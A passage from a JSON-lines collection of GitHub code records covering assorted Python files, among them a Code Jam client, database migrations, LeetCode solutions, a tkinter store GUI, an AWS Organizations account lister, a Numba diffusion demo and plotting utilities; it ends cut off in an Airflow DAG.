To count these submissions correctly, we mark\n  #   them as correct and wrong at the same time, which gives points to the user\n  #   but also adds one wrong try in that input.\n  _CORRECT_STATUSES = frozenset(['Correct', 'Submitted',\n                                 'Correct (+4 minutes)'])\n  _WRONG_STATUSES = frozenset(['Incorrect', 'Time Expired',\n                               'Correct (+4 minutes)'])\n  _TIME_UNITS_TO_SECONDS = {'h': 3600, 'm': 60, 's': 1}\n\n  def __init__(self, key, problem, input_id, status, timestamp):\n    \"\"\"Constructor.\n\n    Args:\n      key: String with the submission key.\n      problem: 0-based index of the submission's problem.\n      input_id: Integer with the input id of the submission.\n      status: String with the submission's status (Correct, Incorrect, etc.).\n      timestamp: Number of seconds that have passed since the contest started\n        when the submission was made.\n    \"\"\"\n    self.key = key\n    self.problem = problem\n    self.input_id = input_id\n    self.status = status\n    self.correct = UserSubmission._GetCorrectnessFromStatus(self.status)\n    self.wrong = UserSubmission._GetWrongnessFromStatus(self.status)\n    self.timestamp = timestamp\n\n  @staticmethod\n  def _GetCorrectnessFromStatus(status):\n    \"\"\"Check whether the submission is correct given its status.\n\n    Args:\n      status: String with a submission's status.\n\n    Returns:\n      True if the submission's output is correct.\n    \"\"\"\n    # Correct types are specified in the _CORRECT_STATUSES set.\n    return status in UserSubmission._CORRECT_STATUSES\n\n  @staticmethod\n  def _GetWrongnessFromStatus(status):\n    \"\"\"Check whether the submission is wrong given its status.\n\n    Args:\n      status: String with a submission's status.\n\n    Returns:\n      True if the submission's output is wrong.\n    \"\"\"\n    # Wrong types are specified in the _WRONG_STATUSES set.\n    return status in UserSubmission._WRONG_STATUSES\n\n  @staticmethod\n  def _ConvertTimestampToSeconds(timestamp):\n    \"\"\"Convert a timestamp from a readable format into a number of seconds.\n\n    The specified timestamp must be formatted as \"[[%dh] %dm] %ds\", where \"%d\"\n    are integers.\n\n    Args:\n      timestamp: String with the human-readable timestamp.\n\n    Returns:\n      The number of seconds since the beginning of the contest represented by\n      timestamp.\n    \"\"\"\n    seconds = 0\n    for token in timestamp.split():\n      time, unit = int(token[:-1]), token[-1]\n      seconds += time * UserSubmission._TIME_UNITS_TO_SECONDS[unit]\n    return seconds\n\n  @staticmethod\n  def FromJsonResponse(json_response, problems):\n    \"\"\"Convert a JSON response with a submission into a more usable format.\n\n    Args:\n      json_response: JSON response received from the server that must be parsed.\n      problems: Iterable with all problems in the current contest.\n\n    Returns:\n      A UserSubmission object with the parsed json_response.\n\n    Raises:\n      error.ServerError: If a required field is missing from the response.\n    \"\"\"\n    # Extract information needed from the JSON response.\n    try:\n      submission_key = json_response['k']\n      problem_key = json_response['p']\n      input_id = json_response['d']\n      status = json_response['s']\n      timestamp = json_response['t']\n    except KeyError as e:\n      raise error.ServerError('Cannot find field {0} in user '\n                              'submission.\\n'.format(e))\n\n    # Parse information into a more usable format and return a user submission.\n    problem_index = utils.GetProblemIndexFromKey(problems, problem_key)\n    parsed_timestamp = UserSubmission._ConvertTimestampToSeconds(timestamp)\n    return UserSubmission(submission_key, problem_index, input_id, status,\n                          parsed_timestamp)\n\n\ndef GetUserSubmissions(host, cookie, contest_id, problems):\n  \"\"\"Get the 
current user's submissions for the current contest.\n\n  Args:\n    host: Domain name of the server where the contest is running.\n    cookie: Cookie for the current user.\n    contest_id: Id of the contest where the user is participating.\n    problems: Iterable with all problems in the current contest.\n\n  Returns:\n    A list of UserSubmission objects with the user submissions for the current\n    contest.\n\n  Raises:\n    error.NetworkError: If a network error occurs while communicating with the\n      server.\n    error.ServerError: If the server answers with a code other than 200 or the\n      response is malformed JSON.\n  \"\"\"\n  # Send an HTTP request to get the contest events.\n  sys.stdout.write('Getting events of contest {0} from \"{1}\"...\\n'.format(\n      contest_id, host))\n  request_referer = 'http://{0}/codejam/contest/dashboard?c={1}'.format(\n      host, contest_id)\n  request_arguments = {\n      'cmd': 'GetEvents',\n      'contest': contest_id,\n      'zx': str(int(time.time())),\n  }\n  request_headers = {\n      'Referer': request_referer,\n      'Cookie': cookie,\n  }\n  try:\n    status, reason, response = http_interface.Get(\n        host, '/codejam/contest/dashboard/do', request_arguments,\n        request_headers)\n  except httplib.HTTPException as e:\n    raise error.NetworkError(\n        'HTTP exception while retrieving user submissions from the Google Code '\n        'Jam server: {0}.\\n'.format(e))\n\n  # Check if the status is not good.\n  if status != 200 or reason != 'OK':\n    raise error.ServerError('Error while communicating with the server, cannot '\n                            'get contest events. Check that the host, username '\n                            'and contest id are valid.\\n')\n\n  # Parse the JSON response and extract the user submissions (or attempts).\n  try:\n    json_response = json.loads(response)\n    submissions = json_response.get('a')\n    if submissions is None:\n      return None\n  except ValueError as e:\n    raise error.ServerError('Cannot parse JSON from server response: '\n                            '{0}.\\n'.format(e))\n\n  # Process each user submission and return them in a list.\n  return [UserSubmission.FromJsonResponse(submission, problems)\n          for submission in submissions]\n","repo_name":"hophacker/algorithm_coding","sub_path":"codejam-commandline-1.2-beta1/lib/user_submissions.py","file_name":"user_submissions.py","file_ext":"py","file_size_in_byte":6635,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"}
+{"seq_id":"12885534678","text":"\"\"\"lightcurve_to_npy\n\nRevision ID: a169bf8b211d\nRevises: 423507fdb18e\nCreate Date: 2017-09-09 22:32:17.558901\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'a169bf8b211d'\ndown_revision = '423507fdb18e'\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n    ### commands auto generated by Alembic - please adjust! ###\n    op.add_column('LightCurves', sa.Column('features_filename', sa.Text(), nullable=True))\n    op.add_column('LightCurves', sa.Column('lc_filename', sa.Text(), nullable=True))\n    op.drop_column('LightCurves', 'hdf_filename')\n    ### end Alembic commands ###\n\n\ndef downgrade():\n    ### commands auto generated by Alembic - please adjust! 
###\n    op.add_column('LightCurves', sa.Column('hdf_filename', sa.TEXT(), nullable=True))\n    op.drop_column('LightCurves', 'lc_filename')\n    op.drop_column('LightCurves', 'features_filename')\n    ### end Alembic commands ###\n","repo_name":"carpyncho/carpyncho","sub_path":"carpyncho/migrations/versions/a169bf8b211d_lightcurve_to_npy.py","file_name":"a169bf8b211d_lightcurve_to_npy.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"33863319514","text":"has2 = {}\ndef solve(n):\n    seq=[]\n    seq.append(n)\n    temp=n\n    while(temp>1):\n        if temp%2==0:\n            temp=int(temp/2)\n            if temp in has2:\n                seq+=has2[temp]\n                break\n            else:\n                seq.append(temp)\n        else:\n            temp=3*temp+1\n            if temp in has2:\n                seq+=has2[temp]\n                break\n            else:\n                seq.append(temp)\n\n\n    has2[n]=seq\n    return len(seq)\n\n\nprint(solve(5))\nprint(solve(10))\n","repo_name":"TheFenrisLycaon/Competitive-Programming","sub_path":"Wow/vopt.py","file_name":"vopt.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"35860751991","text":"class Solution:\n    def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n        head = node = ListNode()\n        carry = 0\n\n        while l1 and l2:\n            total = l1.val + l2.val + carry\n            carry = total // 10\n\n            node.next = ListNode(total % 10)\n            node = node.next\n\n            l1 = l1.next\n            l2 = l2.next\n\n        tail = l1 or l2\n\n        while tail:\n            total = tail.val + carry\n            carry = total // 10\n\n            node.next = ListNode(total % 10)\n            node = node.next\n\n            tail = tail.next\n\n        if carry:\n            node.next = ListNode(carry)\n\n        return head.next\n","repo_name":"pbelskiy/contest","sub_path":"leetcode.com/0002_add_two_numbers/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"39077222708","text":"from tkinter import *\r\nfrom tkinter import messagebox\r\nimport tkinter.font as font\r\nimport csv\r\n\r\n\r\n\r\ndef games_store():\r\n    # create the game selection window\r\n    games = Toplevel(root)\r\n    games.title(my_title)\r\n    games.geometry(my_res)\r\n    games.iconbitmap(my_icon)\r\n\r\n    bg = PhotoImage(file='img/games.png')\r\n    canvas1 = Canvas(games, width=1024, height=768)\r\n    canvas1.grid(row=0, column=0)\r\n    canvas1.create_image(0, 0, image=bg, anchor='nw')\r\n\r\n    gameFrame = Frame(games)\r\n    gameFrame.grid(row=0, column=0)\r\n\r\n    # get the data from the csv file\r\n    filepath = 'csv/video_games.csv'\r\n\r\n    File = open(filepath)\r\n    Reader = csv.reader(File)\r\n    Data = list(Reader)\r\n    del (Data[0])\r\n\r\n    list_of_entries = []\r\n    for x in list(range(0, len(Data))):\r\n        list_of_entries.append(Data[x][0])\r\n\r\n    var = StringVar(value=list_of_entries)\r\n    listbox1 = Listbox(gameFrame, listvariable=var, heigh=40, width=50)\r\n    listbox1.grid(row=0, column=0, sticky='n')\r\n\r\n    def update(): # function to display specific data from the csv file\r\n        index = listbox1.curselection()[0]\r\n        namelabel2.config(text=Data[index][0])\r\n        genrelabel2.config(text=Data[index][5])\r\n        publisherlabel2.config(text=Data[index][7])\r\n        pricelabel2.config(text=Data[index][10])\r\n\r\n        return None\r\n\r\n    def buy():\r\n        acc = Toplevel(root)\r\n        acc.title(my_title)\r\n        acc.geometry('640x480')\r\n        acc.iconbitmap(my_icon)\r\n\r\n        Label(acc, text='Войдите в аккаунт').pack()\r\n        Label(acc, text='Логин ').pack()\r\n        e = Entry(acc)\r\n
e.pack()\r\n\r\n def add_user():\r\n File = open('users.csv', 'a', newline='')\r\n Writer = csv.writer(File)\r\n list_of_users = [e.get()]\r\n Writer.writerow(list_of_users)\r\n messagebox.showinfo(title='Покупка', message='Поздравляем, товар успешно куплен!')\r\n\r\n Button(acc, text='Войти', command=add_user).pack()\r\n\r\n # меню окна\r\n button1 = Button(gameFrame, text=\"Подробнее\", command=update).grid(row=5, column=1)\r\n button2 = Button(gameFrame, text='Купить', command=buy).grid(row=5, column=0)\r\n\r\n namelabel = Label(gameFrame, text=\"Название\")\r\n genrelabel = Label(gameFrame, text=\"Жанр\")\r\n publisherlabel = Label(gameFrame, text=\"Издатель\")\r\n pricelabel = Label(gameFrame, text=\"Цена (в $)\")\r\n\r\n a = 0\r\n for i in (namelabel, genrelabel, publisherlabel, pricelabel):\r\n i.grid(row=a + 1, column=0, sticky='w')\r\n a += 1\r\n\r\n namelabel2 = Label(gameFrame, text=\"\")\r\n genrelabel2 = Label(gameFrame, text=\"\")\r\n publisherlabel2 = Label(gameFrame, text=\"\")\r\n pricelabel2 = Label(gameFrame, text=\"\")\r\n\r\n x = 0\r\n for i in (namelabel2, genrelabel2, publisherlabel2, pricelabel2):\r\n i.grid(row=x+1, column=1, sticky='w')\r\n x += 1\r\n\r\n games.mainloop()\r\n\r\n\r\ndef my_games():\r\n lib = Toplevel(root)\r\n lib.title(my_title)\r\n lib.geometry('640x480')\r\n lib.iconbitmap(my_icon)\r\n\r\n Label(lib, text='Войдите в аккаунт').pack()\r\n Label(lib, text='Логин ').pack()\r\n e = Entry(lib)\r\n e.pack()\r\n\r\n def show_input():\r\n myLabel = Label(lib, text=e.get())\r\n myLabel.pack()\r\n\r\n Button(lib, text='Войти', command=show_input).pack()\r\n\r\n\r\ndef close():\r\n if messagebox.askyesno('Выход', 'Вы уверены?'):\r\n root.destroy()\r\n\r\n\r\n# var\r\nmy_title = 'MOBB'\r\nmy_res = '1024x768'\r\nmy_icon = 'img/mobb.ico'\r\nmy_spacebar = 50 * ' '\r\n\r\n# main (root) window creation\r\nroot = Tk()\r\nroot.title(my_title)\r\nroot.geometry(my_res)\r\nroot.iconbitmap(my_icon)\r\n\r\nbg = PhotoImage(file='img/bg.png')\r\ncanvas1 = Canvas(root, width=1024, height=768)\r\ncanvas1.grid(row=0, column=0)\r\ncanvas1.create_image(0, 0, image=bg, anchor='nw')\r\n\r\n# creation of the frames\r\nmyFrame = Frame(root)\r\nmyFrame.grid(row=0, column=0)\r\n\r\n\r\n# creation of the buttons\r\nmyFont = font.Font(family='Helvetica', size=15)\r\n\r\nmyButton1 = Button(myFrame, text='Выбрать игру', bg='#FFEB3B', padx=59, pady=30,\r\n command=games_store)\r\nmyButton1['font'] = myFont\r\nmyButton1.grid(row=0, column=0)\r\n\r\nmyButton2 = Button(myFrame, text=' Мои игры ', bg='#FFEB3B', padx=57, pady=30,\r\n command=my_games)\r\nmyButton2['font'] = myFont\r\nmyButton2.grid(row=1, column=0)\r\n\r\nmyButton3 = Button(myFrame, text=' Выход ', bg='#D32F2F', padx=49, pady=30,\r\n command=close)\r\nmyButton3['font'] = myFont\r\nmyButton3.grid(row=2, column=0)\r\nroot.mainloop()\r\n","repo_name":"nohararin19/mobb","sub_path":"Модуль 3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24420631213","text":"import string\n\nsrc_str = string.ascii_uppercase\ndst_str = src_str[3:]+src_str[:3]\nprint(dst_str)\nb = input(\"입력하세요:\") # 내가 D를 입력하면 3이 들어감\n\nfor ch in b:\n if ch in src_str:\n print(\"응맞아\")\n\n\n","repo_name":"badyong/pythonkpu","sub_path":"study13.py","file_name":"study13.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 
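Editor's note on the vopt.py record above (seq_id 33863319514): solve() is declared with parameter n but reads an undefined global x throughout, so the closing print(solve(5)) / print(solve(10)) calls raise NameError as written. A minimal corrected sketch, assuming the parameter was meant to be used; the cache name has2 and the append-then-memoize flow are kept from the original:

has2 = {}

def solve(n):
    # Memoized Collatz sequence length: walk n -> 1, reusing cached tails.
    seq = [n]
    temp = n
    while temp > 1:
        temp = temp // 2 if temp % 2 == 0 else 3 * temp + 1
        if temp in has2:
            seq += has2[temp]   # splice in the previously computed tail
            break
        seq.append(temp)
    has2[n] = seq
    return len(seq)

print(solve(5))   # 6: 5 -> 16 -> 8 -> 4 -> 2 -> 1
print(solve(10))  # 7: 10 -> 5, then the cached tail of 5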
+{"seq_id":"34152187851","text":"import ctypes\nimport cupy\n\ngmm_matrix_support = ctypes.cdll.LoadLibrary('./libgmm_matrix_support.so')\n# 设置参数类型\ngmm_matrix_support.dataCovariance.argtypes = [\n ctypes.POINTER(ctypes.c_double),\n ctypes.POINTER(ctypes.c_double),\n ctypes.c_int,\n ctypes.c_int\n]\n\ntestcase = cupy.random.randn(60000, 784) * 2.33 + 0.66\nanswer = cupy.cov(testcase, rowvar=False)\n\nxSubMu = testcase - testcase.mean(axis=0)\noutput = cupy.empty((784, 784), dtype=cupy.float64)\n\ngmm_matrix_support.dataCovariance(\n ctypes.cast(xSubMu.data.ptr, ctypes.POINTER(ctypes.c_double)),\n ctypes.cast(output.data.ptr, ctypes.POINTER(ctypes.c_double)),\n xSubMu.shape[0],\n xSubMu.shape[1]\n)\n\ndiff = cupy.abs(output - answer).max()\nif diff < 1e-8:\n print('test passed.')\nelse:\n print('test wrong! maximum difference: {:.6g}'.format(diff.item()))","repo_name":"jxzhn/gaussian-mixture","sub_path":"unit_test/dataCovariance.py","file_name":"dataCovariance.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27087351961","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n if not lists: return None\n interval = 1\n n = len(lists)\n while interval < n:\n for i in range(0, n-interval, 2*interval):\n lists[i] = self.merge2Lists(lists[i], lists[i+interval])\n interval *= 2\n return lists[0]\n\n def merge2Lists(self, a, b):\n snode = curr = ListNode()\n while a and b:\n if a.val < b.val:\n curr.next = a\n a = a.next\n else:\n curr.next = b\n b = b.next\n curr = curr.next\n if a:\n curr.next = a\n else:\n curr.next = b\n return snode.next\n","repo_name":"Mela2014/lc_punch","sub_path":"lc23_linkedlist.py","file_name":"lc23_linkedlist.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42464484224","text":"import os\nimport sys\nfrom csv import reader\n\nimport unittest\nfrom unittest.mock import patch\n\nsys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\nfrom metrics_data import risk_report\nfrom metrics_data.csv_extras import UnicodeDictReader\n\nclass RiskReportTest(unittest.TestCase):\n\n @patch('metrics_data.base_report.pd')\n def test_get_score_simple(self, mock_pd):\n with open('active_logo_growth.csv') as fd:\n for row in reader(fd):\n row = [int(risk_report.RiskReport._digitize_digit(i)) for i in row]\n score = risk_report.RiskReport.get_score_simple('active_logo_growth', row[0])\n assert score == row[1]\n\n with open('active_logos.csv') as fd:\n for row in reader(fd):\n row = [int(risk_report.RiskReport._digitize_digit(i)) for i in row]\n score = risk_report.RiskReport.get_score_simple('active_logos', row[0])\n assert score == row[1]\n\n @patch('metrics_data.base_report.pd')\n def test_get_score(self, mock_pd):\n with open('active_logos_x_growth.csv') as fd:\n first_row = None\n for row in reader(fd):\n if row[0] == '':\n first_row = row\n continue\n value = int(risk_report.RiskReport._digitize_digit(row[0]))\n for i in range(1, len(first_row)):\n col = int(risk_report.RiskReport._digitize_digit(first_row[i]))\n score = risk_report.RiskReport.get_score('active_logos_x_growth', value, col)\n cell = int(row[i])\n assert score == cell\n\n\nif __name__ == \"__main__\":\n 
unittest.main()\n","repo_name":"Zmeykoo/Metrics-Report","sub_path":"tests/test_risk_report.py","file_name":"test_risk_report.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72813001794","text":"# https://github.com/dannysteenman/aws-toolbox\n#\n# License: MIT\n#\n# This script returns a list of acounts that are part of an Organizational Unit (OU)\n\nimport boto3\nimport sys\n\n\ndef get_ou_for_account(account_id, root_id):\n response = organizations.list_parents(ChildId=account_id)\n parent_id = response[\"Parents\"][0][\"Id\"]\n\n if parent_id == root_id:\n return \"Root\"\n else:\n response = organizations.describe_organizational_unit(\n OrganizationalUnitId=parent_id\n )\n return response[\"OrganizationalUnit\"][\"Name\"]\n\n\n# Get the list of organizational unit names from the command-line arguments\nou_names = sys.argv[1:]\n\n# Create an AWS Organizations client\norganizations = boto3.client(\"organizations\")\n\n# Call the list_roots method to get a list of roots in the organization\nresponse = organizations.list_roots()\n\n# Get the ID of the root\nroot_id = response[\"Roots\"][0][\"Id\"]\n\nif not ou_names:\n # If no OU names are provided, list all accounts in the organization\n response = organizations.list_accounts()\n accounts = response[\"Accounts\"]\n print(\"Found the following accounts for the organization:\\n\")\n\n for account in accounts:\n ou_name = get_ou_for_account(account[\"Id\"], root_id)\n print(\n f'Account ID: {account[\"Id\"]}, Account Alias/Name: {account.get(\"Alias\", account[\"Name\"])}, Organizational Unit: {ou_name}'\n )\nelse:\n # Iterate through the list of OU names and get the ID of each OU\n ou_ids = []\n for ou_name in ou_names:\n # Call the list_organizational_units_for_parent method to get a list of organizational units for the root\n response = organizations.list_organizational_units_for_parent(ParentId=root_id)\n\n # Use a list comprehension to filter the results by name (case-insensitive) and get the ID of the first match\n ou_id = [\n ou[\"Id\"]\n for ou in response[\"OrganizationalUnits\"]\n if ou[\"Name\"].lower() == ou_name.lower()\n ][0]\n ou_ids.append(ou_id)\n\n # Call the list_accounts method for each parent ID (OU or root) to get a list of accounts\n accounts = []\n for parent_id in ou_ids:\n response = organizations.list_accounts_for_parent(ParentId=parent_id)\n accounts.extend(response[\"Accounts\"])\n\n print(f\"Found the following accounts for organizational units: {ou_names}\\n\")\n\n for account in accounts:\n print(\n f'Account ID: {account[\"Id\"]}, Account Alias/Name: {account.get(\"Alias\", account[\"Name\"])}'\n )\n","repo_name":"dannysteenman/aws-toolbox","sub_path":"organizations/list_accounts_by_ou.py","file_name":"list_accounts_by_ou.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":903,"dataset":"github-code","pt":"61"} +{"seq_id":"70040308355","text":"import os\nimport glob\nimport cv2\nimport sys\n\ndir_input = \"/home/leon/AI/EvaluationSetPro/face/reg/xiaomi_faces_from_1920_1080_margin_22/\"\ndir_output = \"/home/leon/AI/EvaluationSetPro/face/reg/xiaomi_faces_160_from_1920_1080_margin_22/\"\n\n\n\ndef create_image_list(dir_input):\n image_list = []\n\n # add sub dir\n img_dirs = os.listdir(dir_input)\n # print(img_dirs)\n for img_dir in img_dirs:\n imgs_list = glob.glob(os.path.join(os.path.join(dir_input,img_dir), \"*.jpg\"))\n image_list += imgs_list\n\n 
# add jpg file\n img_dirs = glob.glob(os.path.join(dir_input, \"*.jpg\"))\n image_list += img_dirs\n\n print(image_list)\n\n return image_list\n# print(image_list)\n# exit()\ndef image_resize(dir_output, image_list, image_size):\n for img_path in image_list:\n img = cv2.imread(img_path)\n img = cv2.resize(img, (image_size[0], image_size[1]))\n print(img_path.split(\"/\"))\n sub_dir = img_path.split(\"/\")[-2]\n full_dir = os.path.join(dir_output, sub_dir)\n if not os.path.exists(full_dir):\n os.makedirs(full_dir)\n cv2.imwrite(os.path.join(full_dir, os.path.basename(img_path)), img)\n\nif __name__ == '__main__':\n dir_input = sys.argv[1]\n dir_output = sys.argv[2]\n\n if not os.path.exists(dir_input):\n print(\"invalid input dir\")\n exit()\n\n if not os.path.exists(dir_output):\n os.makedirs(dir_output)\n\n image_list = create_image_list(dir_input)\n image_resize(dir_output, image_list, (640, 360))\n","repo_name":"fendaq/image_utils","sub_path":"image_resize.py","file_name":"image_resize.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18042926485","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nasm = 5980263\nc = 101898160\no3 = 21567776\n\ny = []\ny.append(asm)\ny.append(c)\ny.append(o3)\n\n\n\nind = np.arange(3) \nwidth = .75 \n\nfig, ax = plt.subplots()\nrects1 = ax.bar(ind, y, width)\n\nax.set_ylabel('Ciclos')\nax.set_title('Comparacion de cantidad de ciclos entre ASM y distintas optimizaciones de C')\n#plt.suptitle('de Rotar ASM y Rotar C', y=1.05, fontsize=17)\nax.set_xticks(ind + 0.4)\nax.set_xticklabels(('ASM','C','O3'))\nplt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))\nrects1[0].set_color('g')\nrects1[1].set_color('b')\nrects1[2].set_color('r')\nplt.ylim(0, 102500000)\n\nplt.show()\n\n","repo_name":"GregorioF/-Soplo-y-Soplo....-pero-su-Tp-aguanto-","sub_path":"Experimentos/COLORIZAR/ASMvsC.py","file_name":"ASMvsC.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6814850347","text":"\"\"\"\nMethod 2\n\n\"\"\"\n\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\nl = list(map(int, input().split()))\ns = sorted(set(l))\nd = {s[i]:i for i in range(len(s))}\nfor i in l:\n print(d[i], end=' ')\n\n\"\"\"\nMethod 1\n시간 초과\n\"\"\"\n\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\nl = list(map(int, input().split()))\ns = sorted(set(l))\nans = []\nfor i in range(len(l)):\n ans.append(s.index(l[i]))\nprint(*ans)","repo_name":"stellaluminary/Baekjoon","sub_path":"18870.py","file_name":"18870.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20127961498","text":"#!/usr/bin/env python\n# -*- animation -*-\n\"\"\"\nSolving The 2D Diffusion Equation\n\"\"\"\n\nimport numpy\nimport gr\nfrom numba.core.decorators import jit\n\ntry:\n from time import perf_counter\nexcept ImportError:\n from time import clock as perf_counter\n\ndx = 0.005\ndy = 0.005\na = 0.5\ndt = dx*dx*dy*dy/(2*a*(dx*dx+dy*dy))\ntimesteps = 150\n\nnx = int(1/dx)\nny = int(1/dy)\nui = numpy.zeros([nx,ny])\nu = numpy.zeros([nx,ny])\n\nfor i in range(nx):\n for j in range(ny):\n if ((i*dx-0.5)**2+(j*dy-0.5)**2 <= 0.1) and ((i*dx-0.5)**2+(j*dy-0.5)**2 >= 0.05):\n ui[i,j] = 1\n\n\ndef diff_step(u, ui):\n for i in range(1, nx-1):\n for j in range(1, ny-1):\n uxx = (ui[i+1,j] 
- 2*ui[i,j] + ui[i-1, j]) / (dx*dx)\n uyy = (ui[i,j+1] - 2*ui[i,j] + ui[i, j-1]) / (dy*dy)\n u[i,j] = ui[i,j]+dt*a*(uxx+uyy)\n\ndiff_step_numba = jit('void(f8[:,:], f8[:,:])')(diff_step)\n\nnow = perf_counter()\n\nt = 0\nworker = 'CPython'\n\nfor m in range(timesteps):\n gr.clearws()\n\n start = now\n if t > 5:\n diff_step_numba(u, ui)\n worker = 'Numba'\n else:\n diff_step(u, ui)\n ui = numpy.copy(u)\n now = perf_counter()\n t = t + now - start\n\n c = 1000 + 255 * u.ravel()\n gr.setviewport(0, 1, 0, 1)\n gr.setcolormap(-32)\n gr.cellarray(0, 1, 0, 1, nx, ny, c)\n gr.text(0.01, 0.95, '%10s: %7.2f fps' % (worker, 1.0 / (now - start)))\n gr.updatews()\n","repo_name":"sciapp/python-gr","sub_path":"examples/diff.py","file_name":"diff.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"61"} +{"seq_id":"23852756140","text":"from setuptools import setup, find_packages\n\nlong_description = \"Placeholder\"\n\nsetup(\n name = \"noteprompt\", # Replace with your own username\n version = \"1.0.0\",\n author = \"Aditya Pal\",\n author_email = \"adityapa.nghss@gmail.com\",\n description = \"A small CLI TODO app in Python\",\n long_description = long_description,\n long_description_content_type = \"text/markdown\",\n url = \"https://github.com/PalAditya/NotePrompt\",\n packages = find_packages(),\n install_requires = [\"plyer\", \"colored\", \"apscheduler\", \"pyautogui\", \"fpdf\"],\n classifiers = [\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n scripts=['src/cli.py']\n)","repo_name":"PalAditya/NotePrompt","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18739370109","text":"import time\nimport pathlib\nfrom glob import glob\n\nimport numpy as np\nimport healpy as hp\nimport matplotlib.pyplot as plt\nimport plotly.colors as pcol\nimport cosmoglobe\nfrom tqdm import tqdm \n\n\ndef get_gaussian_dist(x, mu=0, sigma=1):\n \"\"\"\n Method returns Gaussian distribution for given mu and sigma\n \"\"\"\n return np.exp((-(x-mu)**2)/(2*sigma**2)) / np.sqrt(2*np.pi*sigma**2) \n\ndef plot_component_maps(plots_dir, plot_fname, map_input, map_mu, \n map_rms, map_output, component=\"CMB\"):\n \"\"\"\n Method for plotting component maps. 
\n \"\"\"\n #m_matrix = np.array([input_map, mean_map, rms_map])\n map_tot = [map_input, map_mu, map_rms, map_output]\n idx = 1\n stokes_params = [\"I\", \"Q\", \"U\"]\n titles = [\n r\"$\\mathrm{Input}$\", \n r\"$\\mathrm{Mean}$\", \n r\"$\\mathrm{STD}$\", \n r\"$\\frac{\\mathrm{Mean - Input}}{\\mathrm{STD}}$\"\n ]\n for row, ti in enumerate(titles):#range(len(titles)):\n for col, sig in enumerate(stokes_params):#range(len(stokes_params)):\n sub = (len(titles), len(stokes_params), idx)\n # subplots(nrows, ncols, ...)\n cosmoglobe.plot(map_tot[row][col][:], \n llabel = sig, \n rlabel = ti, \n sub = sub, \n width = 12, \n unit = \"$\\mathrm{\\mu K_{CMB}}$\"\n )\n idx += 1\n plt.tight_layout()\n plt.savefig(plots_dir.joinpath(plot_fname).resolve())\n #plt.show()\n plt.close()\n\ndef plot_component_hists(plots_dir, plot_fname, map_output):\n \"\"\"\n Method for plotting component histograms.\n \"\"\"\n x = np.linspace(-5, 5, 10000)\n y = get_gaussian_dist(x, 0, 1)\n\n stokes_params = [\"I\", \"Q\", \"U\"]\n figure = plt.figure(figsize=(15,5))\n cols = len(stokes_params)\n ax = [1 for i in range(cols)]\n idx = 1\n for col in range(cols):\n ax[col] = figure.add_subplot(1, cols, idx)\n ax[col].set_title(f\"{stokes_params[col]}\")\n ax[col].hist(map_output[col], color=\"C10\", bins=100, range=(-6, 6),\n alpha=1, lw=0.1, \n density=True, rasterized=True)\n ax[col].plot(x,y, \"--\", alpha=0.8, color=\"C3\", \n rasterized=True, label=f\"$N(0,1)$\")\n idx += 1\n plt.savefig(plots_dir.joinpath(plot_fname).resolve())\n #plt.show()\n plt.close()\n","repo_name":"Cosmoglobe/Component-Separation-Course","sub_path":"sims_paper/pymods/plot_mod.py","file_name":"plot_mod.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"35042066686","text":"from datetime import datetime, timedelta\n\nfrom airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\n\nfrom google_analytics_plugin.schemas.google_analytics_schemas import google_analytics_reporting_schema\nfrom airflow.operators import GoogleAnalyticsReportingToSqlOperator\n\nfrom conf import 